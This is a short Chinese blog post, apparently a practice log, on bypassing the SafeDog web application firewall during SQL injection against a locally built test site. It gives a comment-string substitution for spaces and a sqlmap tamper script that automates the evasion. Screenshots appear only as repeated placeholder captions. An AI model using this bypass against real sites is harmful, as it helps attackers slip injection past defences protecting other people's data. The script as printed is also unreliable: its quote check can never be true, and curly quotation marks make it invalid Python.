sqlmap过狗脚本练习1

徐悦TechBlog 2020-05-27

本地搭建sql注入网站练习

sqlmap过狗脚本练习1?

测试安全狗,输入不合法参数被安全狗拦截:

sqlmap过狗脚本练习1?

使用sqlmap:

sqlmap过狗脚本练习1?

sqlmap过狗脚本练习1?

检测到防护机制,失败;

先手工尝试绕过安全狗:

sqlmap过狗脚本练习1?

将空格替换为  “/*//\*//\*\/c*/” 成功绕过安全狗;

写个sqlmap脚本:

#demo.py
def tamper(payload,**kwargs):
    retVal = payload
    quote=False
    if payload:
        retVal = ‘‘
        for i in payload:
            if i =="‘" and i==‘"‘:
                quote = not quote
            elif i.isspace() and not quote:
                retVal+=‘/*//\*//\*\/c*/‘
            else:
                retVal+=i
    return retVal

加上脚本继续跑:

sqlmap过狗脚本练习1?

sqlmap过狗脚本练习1?

成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)

相关推荐